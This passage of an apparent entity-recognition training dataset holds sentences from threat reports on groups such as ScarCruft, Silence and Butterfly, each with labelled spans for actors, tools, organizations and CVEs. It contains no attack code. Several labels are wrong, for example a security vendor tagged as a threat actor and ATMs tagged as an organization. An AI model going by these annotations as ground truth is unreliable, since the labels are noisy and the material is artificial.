"dnrti_train_002344", "source": "dnrti_train"}} {"text": "PassCV continues to maintain a heavy reliance on obfuscated and signed versions of older RATs like ZxShell and Ghost RAT , which have remained a favorite of the wider Chinese criminal community since their initial public release .", "spans": {"THREAT_ACTOR: PassCV": [[0, 6]], "TOOL: RATs": [[89, 93]], "TOOL: ZxShell": [[99, 106]], "TOOL: Ghost RAT": [[111, 120]]}, "info": {"id": "dnrti_train_002345", "source": "dnrti_train"}} {"text": "SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire .", "spans": {"ORGANIZATION: SPEAR": [[0, 5]], "TOOL: PassCV samples": [[24, 38]], "TOOL: RAT": [[99, 102]], "TOOL: Netwire": [[110, 117]]}, "info": {"id": "dnrti_train_002346", "source": "dnrti_train"}} {"text": "The first new connection SPEAR identified was derived from an email address listed in Blue Coat Systems' original report on PassCV .", "spans": {"ORGANIZATION: SPEAR": [[25, 30]], "THREAT_ACTOR: PassCV": [[124, 130]]}, "info": {"id": "dnrti_train_002348", "source": "dnrti_train"}} {"text": "Syncopate is a well-known Russian company that is best known as the developer and operator of the ' GameNet ' platform .", "spans": {"ORGANIZATION: company": [[34, 41]]}, "info": {"id": "dnrti_train_002349", "source": "dnrti_train"}} {"text": "The PassCV group continues to be extremely effective in compromising both small and large game companies and surreptitiously using their code-signing certificates to infect an even larger swath of organizations .", "spans": {"THREAT_ACTOR: PassCV": [[4, 10]], "ORGANIZATION: game companies": [[90, 104]]}, "info": {"id": "dnrti_train_002350", "source": "dnrti_train"}} {"text": "Since the last report , PassCV has significantly expanded its targets to include victims in the United States , Taiwan , China and Russia .", "spans": {"THREAT_ACTOR: PassCV": [[24, 30]]}, "info": {"id": "dnrti_train_002351", "source": "dnrti_train"}} 
{"text": "Based on data collected from Palo Alto Networks AutoFocus threat intelligence , we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe , with a concentration of attacks in late October and continuing into December .", "spans": {"ORGANIZATION: Palo Alto Networks AutoFocus": [[29, 57]]}, "info": {"id": "dnrti_train_002352", "source": "dnrti_train"}} {"text": "BBSRAT is typically packaged within a portable executable file , although in a few of the observed instances , a raw DLL was discovered to contain BBSRAT .", "spans": {"TOOL: BBSRAT": [[0, 6], [147, 153]]}, "info": {"id": "dnrti_train_002354", "source": "dnrti_train"}} {"text": "WildFire properly classifies BBSRAT malware samples as malicious .", "spans": {"ORGANIZATION: WildFire": [[0, 8]], "TOOL: BBSRAT malware samples": [[29, 51]]}, "info": {"id": "dnrti_train_002355", "source": "dnrti_train"}} {"text": "This week we will discuss another Chinese nexus adversary we call Samurai Panda .", "spans": {}, "info": {"id": "dnrti_train_002356", "source": "dnrti_train"}} {"text": "Samurai Panda is interesting in that their target selection tends to focus on Asia Pacific victims in Japan , the Republic of Korea , and other democratic Asian victims .", "spans": {"THREAT_ACTOR: Samurai Panda": [[0, 13]]}, "info": {"id": "dnrti_train_002357", "source": "dnrti_train"}} {"text": "Next , in an effort to demonstrate it wasn't relegated to China , CrowdStrike exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary .", "spans": {"ORGANIZATION: CrowdStrike": [[66, 77]]}, "info": {"id": "dnrti_train_002358", "source": "dnrti_train"}} {"text": "Next , in an effort to demonstrate it wasn't relegated to China , we exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary .", "spans": 
{}, "info": {"id": "dnrti_train_002359", "source": "dnrti_train"}} {"text": "Beginning in 2009 , we've observed this actor conduct more than 40 unique campaigns that we've identified in the malware configurations' campaign codes .", "spans": {}, "info": {"id": "dnrti_train_002360", "source": "dnrti_train"}} {"text": "These codes are often leveraged in the malware used by coordinated targeted attackers to differentiate victims that were successfully compromised from different target sets .", "spans": {}, "info": {"id": "dnrti_train_002361", "source": "dnrti_train"}} {"text": "When conducting programmatic espionage activity , it can presumably become quite confusing if the attacker targets a heavy industry company , an avionics program , and seven other unique targets as to which infected host you will collect what information from .", "spans": {"ORGANIZATION: heavy industry company": [[117, 139]]}, "info": {"id": "dnrti_train_002362", "source": "dnrti_train"}} {"text": "These rules detect the malware \" beaconing \" to the command-and-control server , the initial malware check-in , and an attempt to download a backdoor module .", "spans": {"TOOL: beaconing": [[33, 42]], "TOOL: command-and-control server": [[52, 78]]}, "info": {"id": "dnrti_train_002363", "source": "dnrti_train"}} {"text": "Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks .", "spans": {"ORGANIZATION: Securelist": [[21, 31]], "VULNERABILITY: zero-day Adobe Flash Player exploit": [[61, 96]]}, "info": {"id": "dnrti_train_002364", "source": "dnrti_train"}} {"text": "Securelist believe the attacks are launched by an APT Group we track under the codename \" ScarCruft \" .", "spans": {"THREAT_ACTOR: Securelist": [[0, 10]], "THREAT_ACTOR: ScarCruft": [[90, 99]]}, "info": {"id": "dnrti_train_002365", "source": "dnrti_train"}} {"text": "ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South 
Korea , China , India , Kuwait and Romania .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]]}, "info": {"id": "dnrti_train_002366", "source": "dnrti_train"}} {"text": "ScarCruft has several ongoing operations , utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]], "TOOL: Adobe Flash": [[81, 92]], "TOOL: Microsoft Internet Explorer": [[105, 132]]}, "info": {"id": "dnrti_train_002367", "source": "dnrti_train"}} {"text": "Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit .", "spans": {"VULNERABILITY: 0-day": [[111, 116]], "VULNERABILITY: Adobe Flash Player exploit": [[119, 145]]}, "info": {"id": "dnrti_train_002369", "source": "dnrti_train"}} {"text": "Adobe Flash Player exploit .", "spans": {"VULNERABILITY: Adobe Flash Player exploit": [[0, 26]]}, "info": {"id": "dnrti_train_002370", "source": "dnrti_train"}} {"text": "It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April .", "spans": {"THREAT_ACTOR: ScarCruft": [[25, 34]], "VULNERABILITY: zero day exploit": [[52, 68]], "VULNERABILITY: CVE-2016-0147": [[71, 84]]}, "info": {"id": "dnrti_train_002371", "source": "dnrti_train"}} {"text": "Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": {"VULNERABILITY: Flash Player exploit": [[35, 55]], "VULNERABILITY: CVE-2016-4117": [[58, 71]]}, "info": {"id": "dnrti_train_002372", "source": "dnrti_train"}} {"text": "ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]], "VULNERABILITY: Flash Player exploit": [[48, 68]], "VULNERABILITY: CVE-2016-4117": [[71, 84]]}, "info": {"id": "dnrti_train_002373", "source": "dnrti_train"}} {"text": 
"Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets .", "spans": {"THREAT_ACTOR: ScarCruft": [[49, 58]], "VULNERABILITY: zero-day exploits": [[92, 109]]}, "info": {"id": "dnrti_train_002374", "source": "dnrti_train"}} {"text": "After publishing our initial series of blogposts back in 2016 , Kaspersky have continued to track the ScarCruft threat actor .", "spans": {"ORGANIZATION: Kaspersky": [[64, 73]], "THREAT_ACTOR: ScarCruft": [[102, 111]]}, "info": {"id": "dnrti_train_002375", "source": "dnrti_train"}} {"text": "After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor .", "spans": {}, "info": {"id": "dnrti_train_002376", "source": "dnrti_train"}} {"text": "ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]]}, "info": {"id": "dnrti_train_002377", "source": "dnrti_train"}} {"text": "The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises ( SWC ) .", "spans": {"THREAT_ACTOR: ScarCruft group": [[4, 19]], "TOOL: SWC": [[115, 118]]}, "info": {"id": "dnrti_train_002378", "source": "dnrti_train"}} {"text": "ScarCruft uses a multi-stage binary infection scheme .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]]}, "info": {"id": "dnrti_train_002380", "source": "dnrti_train"}} {"text": "One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges .", "spans": {"TOOL: dropper": [[49, 56]]}, "info": {"id": "dnrti_train_002381", "source": "dnrti_train"}} {"text": "This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams .", "spans": 
{"VULNERABILITY: CVE-2018-8120": [[63, 76]], "TOOL: UACME": [[80, 85]]}, "info": {"id": "dnrti_train_002382", "source": "dnrti_train"}} {"text": "Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it .", "spans": {}, "info": {"id": "dnrti_train_002383", "source": "dnrti_train"}} {"text": "The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload .", "spans": {"TOOL: downloader malware": [[4, 22]]}, "info": {"id": "dnrti_train_002384", "source": "dnrti_train"}} {"text": "The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration .", "spans": {"THREAT_ACTOR: ScarCruft": [[4, 13]]}, "info": {"id": "dnrti_train_002385", "source": "dnrti_train"}} {"text": "We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester .", "spans": {"TOOL: malware": [[48, 55]], "MALWARE: Bluetooth device harvester": [[89, 115]]}, "info": {"id": "dnrti_train_002386", "source": "dnrti_train"}} {"text": "We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them .", "spans": {}, "info": {"id": "dnrti_train_002387", "source": "dnrti_train"}} {"text": "ScarCruft also attacked a diplomatic agency in Hong Kong , and another diplomatic agency in North Korea .", "spans": {"ORGANIZATION: diplomatic agency": [[26, 43], [71, 88]]}, "info": {"id": "dnrti_train_002388", "source": "dnrti_train"}} {"text": "It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes .", "spans": {"THREAT_ACTOR: ScarCruft": [[11, 20]]}, "info": {"id": "dnrti_train_002389", "source": "dnrti_train"}} {"text": "ScarCruft infected this victim on September 21 , 2018 .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]]}, "info": {"id": "dnrti_train_002390", "source": 
"dnrti_train"}} {"text": "But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26 , 2018 .", "spans": {"THREAT_ACTOR: ScarCruft": [[15, 24]]}, "info": {"id": "dnrti_train_002391", "source": "dnrti_train"}} {"text": "ScarCruft has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]], "ORGANIZATION: business sector": [[79, 94]], "ORGANIZATION: diplomatic agencies": [[151, 170]]}, "info": {"id": "dnrti_train_002392", "source": "dnrti_train"}} {"text": "Earlier this month , we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks .", "spans": {"VULNERABILITY: zero-day Adobe Flash Player exploit": [[39, 74]]}, "info": {"id": "dnrti_train_002393", "source": "dnrti_train"}} {"text": "ScarCruft is a relatively new APT group ; victims have been observed in several countries , including Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]]}, "info": {"id": "dnrti_train_002394", "source": "dnrti_train"}} {"text": "Currently , the group is engaged in two major operations : Operation Daybreak and Operation Erebus .", "spans": {}, "info": {"id": "dnrti_train_002395", "source": "dnrti_train"}} {"text": "The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": {"VULNERABILITY: CVE-2016-4117": [[77, 90]]}, "info": {"id": "dnrti_train_002396", "source": "dnrti_train"}} {"text": "The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": {"VULNERABILITY: CVE-2016-4117": [[68, 81]]}, "info": {"id": "dnrti_train_002397", "source": "dnrti_train"}} {"text": "We will publish more details about the 
attack once Adobe patches the vulnerability , which should be on June 16 .", "spans": {}, "info": {"id": "dnrti_train_002398", "source": "dnrti_train"}} {"text": "The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily .", "spans": {"VULNERABILITY: Flash zero day": [[41, 55]]}, "info": {"id": "dnrti_train_002399", "source": "dnrti_train"}} {"text": "Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia .", "spans": {"VULNERABILITY: zero-day vulnerability": [[28, 50]]}, "info": {"id": "dnrti_train_002400", "source": "dnrti_train"}} {"text": "Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak .", "spans": {"ORGANIZATION: Kaspersky Lab": [[15, 28], [156, 169]], "VULNERABILITY: zero-day": [[94, 102]]}, "info": {"id": "dnrti_train_002401", "source": "dnrti_train"}} {"text": "Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: ScarCruft": [[26, 35]], "VULNERABILITY: zero-day": [[65, 73]], "VULNERABILITY: CVE-2016-0147": [[76, 89]]}, "info": {"id": "dnrti_train_002402", "source": "dnrti_train"}} {"text": "Attacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks .", "spans": {"THREAT_ACTOR: ScarCruft": [[113, 122]]}, "info": {"id": "dnrti_train_002403", "source": "dnrti_train"}} {"text": "Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering 
hole attacks as a means of propagation .", "spans": {"VULNERABILITY: Flash exploit": [[65, 78]], "VULNERABILITY: CVE-2016-4117": [[81, 94]]}, "info": {"id": "dnrti_train_002404", "source": "dnrti_train"}} {"text": "Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 .", "spans": {"VULNERABILITY: zero day": [[82, 90]], "VULNERABILITY: CVE-2016-4171": [[91, 104]]}, "info": {"id": "dnrti_train_002405", "source": "dnrti_train"}} {"text": "The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019 .", "spans": {}, "info": {"id": "dnrti_train_002406", "source": "dnrti_train"}} {"text": "Cisco Talos assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 .", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]]}, "info": {"id": "dnrti_train_002407", "source": "dnrti_train"}} {"text": "We assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 .", "spans": {}, "info": {"id": "dnrti_train_002408", "source": "dnrti_train"}} {"text": "The common use of the Enfal Trojan suggests that Shadow Network may be exchanging tools and techniques .", "spans": {"TOOL: Enfal Trojan": [[22, 34]]}, "info": {"id": "dnrti_train_002409", "source": "dnrti_train"}} {"text": "While Silence had previously targeted Russian banks , Group-IB experts also have discovered evidence of the group 's activity in more than 25 countries worldwide .", "spans": {"THREAT_ACTOR: While Silence": [[0, 13]], "ORGANIZATION: Group-IB": [[54, 62]]}, "info": {"id": "dnrti_train_002410", "source": "dnrti_train"}} {"text": "In August 2017 , the National Bank of Ukraine warned state-owned and private banks across the country about a large-scale phishing attack .", "spans": {"ORGANIZATION: 
National Bank": [[21, 34]]}, "info": {"id": "dnrti_train_002411", "source": "dnrti_train"}} {"text": "The threat actor used an exploit from the arsenal of the state-sponsored hacker group APT28 .", "spans": {"THREAT_ACTOR: APT28": [[86, 91]]}, "info": {"id": "dnrti_train_002412", "source": "dnrti_train"}} {"text": "The new threat actor group was eventually named Silence .", "spans": {}, "info": {"id": "dnrti_train_002413", "source": "dnrti_train"}} {"text": "Silence is a group of Russian-speaking hackers , based on their commands language , the location of infrastructure they used , and the geography of their targets ( Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan ) .", "spans": {}, "info": {"id": "dnrti_train_002414", "source": "dnrti_train"}} {"text": "Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": {"ORGANIZATION: bank employees": [[54, 68]]}, "info": {"id": "dnrti_train_002415", "source": "dnrti_train"}} {"text": "Silence also used Russian-language web hosting services .", "spans": {"TOOL: web hosting services": [[35, 55]]}, "info": {"id": "dnrti_train_002416", "source": "dnrti_train"}} {"text": "Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as — Anunak , Corkow , Buhtrap — usually managed botnets using developed or modified banking Trojans .", "spans": {"ORGANIZATION: financial sector": [[80, 96]], "TOOL: Corkow": [[116, 122]]}, "info": {"id": "dnrti_train_002417", "source": "dnrti_train"}} {"text": "They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": {"ORGANIZATION: Central Bank 's Automated Workstation Client": [[90, 134]], "ORGANIZATION: ATMs": [[139, 143]]}, "info": {"id": "dnrti_train_002418", "source": "dnrti_train"}} {"text": "Group-IB researchers were tracking Silence 
throughout this period and conducting response following incidents in the financial sector .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "ORGANIZATION: financial sector": [[117, 133]]}, "info": {"id": "dnrti_train_002419", "source": "dnrti_train"}} {"text": "Group-IB detected the first incidents relating to Silence in June 2016 .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]]}, "info": {"id": "dnrti_train_002420", "source": "dnrti_train"}} {"text": "One of Silence 's first targets was a Russian bank , when they tried to attack AWS CBR .", "spans": {}, "info": {"id": "dnrti_train_002421", "source": "dnrti_train"}} {"text": "They are selective in their attacks and wait for about three months between incidents , which is approximately three times longer than other financially motivated APT groups , like MoneyTaker , Anunak ( Carbanak ) , Buhtrap or Cobalt .", "spans": {}, "info": {"id": "dnrti_train_002422", "source": "dnrti_train"}} {"text": "Silence try to apply new techniques and ways of stealing from various banking systems , including AWS CBR , ATMs , and card processing .", "spans": {}, "info": {"id": "dnrti_train_002423", "source": "dnrti_train"}} {"text": "Silence 's successful attacks currently have been limited to the CIS and Eastern European countries .", "spans": {}, "info": {"id": "dnrti_train_002424", "source": "dnrti_train"}} {"text": "He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software .", "spans": {}, "info": {"id": "dnrti_train_002425", "source": "dnrti_train"}} {"text": "Silence 's main targets are located in Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan .", "spans": {}, "info": {"id": "dnrti_train_002426", "source": "dnrti_train"}} {"text": "However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , 
Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": {"ORGANIZATION: bank employees": [[44, 58]]}, "info": {"id": "dnrti_train_002427", "source": "dnrti_train"}} {"text": "In the same year , they conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans .", "spans": {"TOOL: Perl IRC bot": [[57, 69]], "TOOL: public IRC chats": [[74, 90]]}, "info": {"id": "dnrti_train_002428", "source": "dnrti_train"}} {"text": "In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans .", "spans": {"TOOL: Perl IRC bot": [[60, 72]], "TOOL: public IRC chats": [[77, 93]]}, "info": {"id": "dnrti_train_002429", "source": "dnrti_train"}} {"text": "In two months , the group returned to their proven method and withdrew funds again through ATMs .", "spans": {}, "info": {"id": "dnrti_train_002430", "source": "dnrti_train"}} {"text": "In September 2017 , we discovered a new targeted attack on financial institutions .", "spans": {"ORGANIZATION: financial institutions": [[59, 81]]}, "info": {"id": "dnrti_train_002431", "source": "dnrti_train"}} {"text": "In September 2017 , we discovered Silence attack on financial institutions .", "spans": {"ORGANIZATION: financial institutions": [[52, 74]]}, "info": {"id": "dnrti_train_002432", "source": "dnrti_train"}} {"text": "The infection vector is a spear-phishing email with a malicious attachment .", "spans": {}, "info": {"id": "dnrti_train_002433", "source": "dnrti_train"}} {"text": "An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": {"ORGANIZATION: bank employees": [[189, 203]]}, "info": {"id": "dnrti_train_002434", 
"source": "dnrti_train"}} {"text": "The spear-phishing infection vector is still the most popular way to initiate targeted campaigns .", "spans": {}, "info": {"id": "dnrti_train_002435", "source": "dnrti_train"}} {"text": "We conclude that the actor behind the attack is Silence group , a relatively new threat actor that's been operating since mid-2016 .", "spans": {}, "info": {"id": "dnrti_train_002436", "source": "dnrti_train"}} {"text": "A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": {"ORGANIZATION: employees": [[181, 190]], "ORGANIZATION: financial entities": [[196, 214]]}, "info": {"id": "dnrti_train_002437", "source": "dnrti_train"}} {"text": "As shown above , the threat runs several native binaries to collect useful information for its recon phase .", "spans": {"TOOL: native binaries": [[41, 56]]}, "info": {"id": "dnrti_train_002438", "source": "dnrti_train"}} {"text": "The intelligence we have collected shows that Silence is part of a more extensive operation , still focused on financial institutions operating mainly on Russian territory .", "spans": {"ORGANIZATION: financial institutions": [[111, 133]]}, "info": {"id": "dnrti_train_002439", "source": "dnrti_train"}} {"text": "These spearphishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting .", "spans": {}, "info": {"id": "dnrti_train_002440", "source": "dnrti_train"}} {"text": "Based on file modification dates and timestamps of samples , it appears that the observed campaign was initiated in the middle of February 2016 , with the infrastructure taken offline at the start of March .", "spans": {}, "info": {"id": "dnrti_train_002441", "source": "dnrti_train"}} {"text": "While the Sima moniker 
could similarly originate from software labels , it is a common female Persian name and a Persian-language word for \" visage \" or \" appearance \" .", "spans": {}, "info": {"id": "dnrti_train_002442", "source": "dnrti_train"}} {"text": "Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": {"ORGANIZATION: social engineering campaigns": [[31, 59]], "ORGANIZATION: women 's rights activists": [[68, 93]]}, "info": {"id": "dnrti_train_002443", "source": "dnrti_train"}} {"text": "Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder .", "spans": {"ORGANIZATION: Iranians": [[67, 75]]}, "info": {"id": "dnrti_train_002444", "source": "dnrti_train"}} {"text": "The Sima group also engaged in impersonation of Citizenship and Immigration Services at the Department of Homeland Security , posing as a notice about the expiration of the recipient 's Permanent Residence status .", "spans": {"THREAT_ACTOR: Sima": [[4, 8]], "ORGANIZATION: Department of Homeland Security": [[92, 123]]}, "info": {"id": "dnrti_train_002445", "source": "dnrti_train"}} {"text": "In another case , Sima mirrored an announcement made about the broadcast of a television program on Iranian-American cultural affairs in order to impersonate the individual and engage in spearphishing within hours of the legitimate message .", "spans": {"THREAT_ACTOR: Sima": [[18, 22]]}, "info": {"id": "dnrti_train_002446", "source": "dnrti_train"}} {"text": "The server used to host these malware samples was located on the German provider Hetzner ( 148.251.55.114 ) , within a small block of IP addresses that are registered with the customer ID \" HOS-156205 \" .", "spans": {"ORGANIZATION: provider": [[72, 80]]}, "info": {"id": "dnrti_train_002447", "source": "dnrti_train"}} {"text": "All the samples appear to be have been compiled 
between February 29 and March 1 2016 , shortly before our discovery , suggesting that , despite the known C&C servers having quickly gone offline shortly after , this spree of attacks might be fresh and currently undergoing .", "spans": {}, "info": {"id": "dnrti_train_002448", "source": "dnrti_train"}} {"text": "These archives provide further indication that those entities behind the campaigns are Persian-language speakers , due to the naming of files and folders in Persian .", "spans": {}, "info": {"id": "dnrti_train_002449", "source": "dnrti_train"}} {"text": "For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": {"ORGANIZATION: diaspora": [[147, 155]]}, "info": {"id": "dnrti_train_002450", "source": "dnrti_train"}} {"text": "Butterfly has attacked multi-billion dollar companies operating in the internet , IT software , pharmaceutical , and commodities sectors .", "spans": {"THREAT_ACTOR: Butterfly": [[0, 9]], "ORGANIZATION: multi-billion dollar companies": [[23, 53]], "ORGANIZATION: commodities sectors": [[117, 136]]}, "info": {"id": "dnrti_train_002451", "source": "dnrti_train"}} {"text": "The first signs of Butterfly 's activities emerged in early 2013 when several major technology and internet firms were compromised .", "spans": {"ORGANIZATION: internet firms": [[99, 113]]}, "info": {"id": "dnrti_train_002452", "source": "dnrti_train"}} {"text": "However , an investigation by Symantec has found that the group has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number .", "spans": {"ORGANIZATION: Symantec": [[30, 38]]}, "info": {"id": "dnrti_train_002453", "source": "dnrti_train"}} {"text": "Symantec has to date discovered 49 different organizations in more than 20 countries that have been attacked by Butterfly .", "spans": {"ORGANIZATION: Symantec": [[0, 8]]}, "info": 
{"id": "dnrti_train_002454", "source": "dnrti_train"}} {"text": "Aside from the four companies which have publicly acknowledged attacks , Symantec has identified five other large technology firms compromised by Butterfly , primarily headquartered in the US .", "spans": {"ORGANIZATION: Symantec": [[73, 81]], "ORGANIZATION: technology firms": [[114, 130]]}, "info": {"id": "dnrti_train_002455", "source": "dnrti_train"}} {"text": "In the first attack , Butterfly gained a foothold by first attacking a small European office belonging to one firm and using this infection to then move on to its US office and European headquarters .", "spans": {}, "info": {"id": "dnrti_train_002456", "source": "dnrti_train"}} {"text": "However , technology is not the only sector the group has focused on and Symantec has found evidence that Butterfly has attacked three major European pharmaceutical firms .", "spans": {"ORGANIZATION: Symantec": [[73, 81]], "ORGANIZATION: pharmaceutical firms": [[150, 170]]}, "info": {"id": "dnrti_train_002457", "source": "dnrti_train"}} {"text": "Butterfly has also shown an interest in the commodities sector , attacking two major companies involved in gold and oil in late 2014 .", "spans": {"THREAT_ACTOR: Butterfly": [[0, 9]], "ORGANIZATION: commodities sector": [[44, 62]]}, "info": {"id": "dnrti_train_002458", "source": "dnrti_train"}} {"text": "The company specializes in finance and natural resources specific to that region .", "spans": {}, "info": {"id": "dnrti_train_002459", "source": "dnrti_train"}} {"text": "The latter was one of at least three law firms Butterfly has targeted over the past three years .", "spans": {"ORGANIZATION: law firms": [[37, 46]], "THREAT_ACTOR: Butterfly": [[47, 56]]}, "info": {"id": "dnrti_train_002460", "source": "dnrti_train"}} {"text": "In many attacks , the group has succeeded in compromising Microsoft Exchange or Lotus Domino email servers in order to intercept company emails and possibly use them to send counterfeit 
emails .", "spans": {"TOOL: Microsoft Exchange": [[58, 76]], "TOOL: Lotus Domino email servers": [[80, 106]]}, "info": {"id": "dnrti_train_002461", "source": "dnrti_train"}} {"text": "A powerful threat actor known as \" Wild Neutron \" ( also known as \" Jripbot \" and \" Morpho \" ) has been active since at least 2011 , infecting high profile companies for several years by using a combination of exploits , watering holes and multi-platform malware .", "spans": {"THREAT_ACTOR: Jripbot": [[68, 75]], "THREAT_ACTOR: Morpho": [[84, 90]], "ORGANIZATION: high profile companies": [[143, 165]]}, "info": {"id": "dnrti_train_002462", "source": "dnrti_train"}} {"text": "Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from .", "spans": {"ORGANIZATION: Symantec": [[92, 100]]}, "info": {"id": "dnrti_train_002463", "source": "dnrti_train"}} {"text": "Wild Neutron hit the spotlight in 2013 , when it successfully infected companies such as Apple , Facebook , Twitter and Microsoft .", "spans": {"ORGANIZATION: Apple": [[89, 94]], "ORGANIZATION: Facebook": [[97, 105]], "ORGANIZATION: Twitter": [[108, 115]], "ORGANIZATION: Microsoft": [[120, 129]]}, "info": {"id": "dnrti_train_002464", "source": "dnrti_train"}} {"text": "Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit .", "spans": {"THREAT_ACTOR: Wild Neutron": [[0, 12]], "TOOL: stolen code signing certificate": [[39, 70]], "VULNERABILITY: Flash Player exploit": [[132, 152]]}, "info": {"id": "dnrti_train_002465", "source": "dnrti_train"}} {"text": "During the 2013 attacks , the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk.com , which is an iPhone developers forum .", "spans": {}, "info": {"id": "dnrti_train_002466", "source": "dnrti_train"}} 
{"text": "Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes .", "spans": {"THREAT_ACTOR: Wild Neutron": [[0, 12]], "VULNERABILITY: Java zero-day exploit": [[43, 64]]}, "info": {"id": "dnrti_train_002467", "source": "dnrti_train"}} {"text": "While the group used watering hole attacks in 2013 , it's still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks .", "spans": {}, "info": {"id": "dnrti_train_002468", "source": "dnrti_train"}} {"text": "Wild Neutron 's tools include a password harvesting trojan , a reverse-shell backdoor and customized implementations of OpenSSH , WMIC and SMB .", "spans": {"THREAT_ACTOR: Wild Neutron": [[0, 12]], "TOOL: password harvesting trojan": [[32, 58]], "TOOL: reverse-shell backdoor": [[63, 85]], "TOOL: customized implementations of OpenSSH": [[90, 127]], "TOOL: WMIC": [[130, 134]], "TOOL: SMB": [[139, 142]]}, "info": {"id": "dnrti_train_002469", "source": "dnrti_train"}} {"text": "Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by 